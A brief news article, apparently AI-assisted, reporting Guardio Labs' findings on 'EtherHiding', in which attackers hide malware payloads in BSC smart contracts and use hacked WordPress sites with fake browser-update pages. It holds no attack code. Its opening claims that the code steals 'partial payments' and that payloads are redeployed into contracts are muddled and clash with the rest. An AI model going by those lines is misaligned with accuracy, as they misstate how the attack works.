Hackers Are Now Using the Blockchain to Hide Their Malware
An Oct. 15 report from security firm Guardio Labs revealed a new “blackhat” cybersecurity threat that hackers are using as a mechanism to embed malicious code that is designed to steal partial payments from blockchain contracts.
Dubbed “EtherHiding,” the attack involves infiltrating WordPress websites by implanting code that retrieves partial payloads from blockchain contracts, subsequently deploying these payloads within BSC smart contracts. These smart contracts effectively function as clandestine, anonymous hosting platforms for malicious code.
What makes this attack particularly insidious is its adaptability. Hackers have the ability to modify the code and change attack methods at their discretion.
Most recently, they have employed fake browser updates as their delivery mechanism. Victims are enticed to update their web browsers via a counterfeit landing page and link. Within the payload lies JavaScript code that retrieves additional instructions from domains controlled by the attackers. This ultimately leads to complete site defacement, with counterfeit browser update notifications serving as vehicles for malware distribution.
The “flexibility” in EtherHiding, enables black hatters to alter the attack chain with each new blockchain transaction, making mitigation efforts challenging.
Nati Tal, Head of Cybersecurity at Guardio Labs, and fellow security researcher Oleg Zaytsev emphasized that because WordPress sites “are so vulnerable and frequently compromised,” they serve as a “primary gateway” for these types of threats to impact a significant number of people, as WordPress powers approximately 43% of all websites.
Once these compromised smart contracts are deployed, they operate autonomously, leaving Binance with little recourse other than relying on its developer community to flag malicious code within contracts when detected.
Editor’s note: This article was written by an nft now staff member in collaboration with OpenAI’s GPT-4.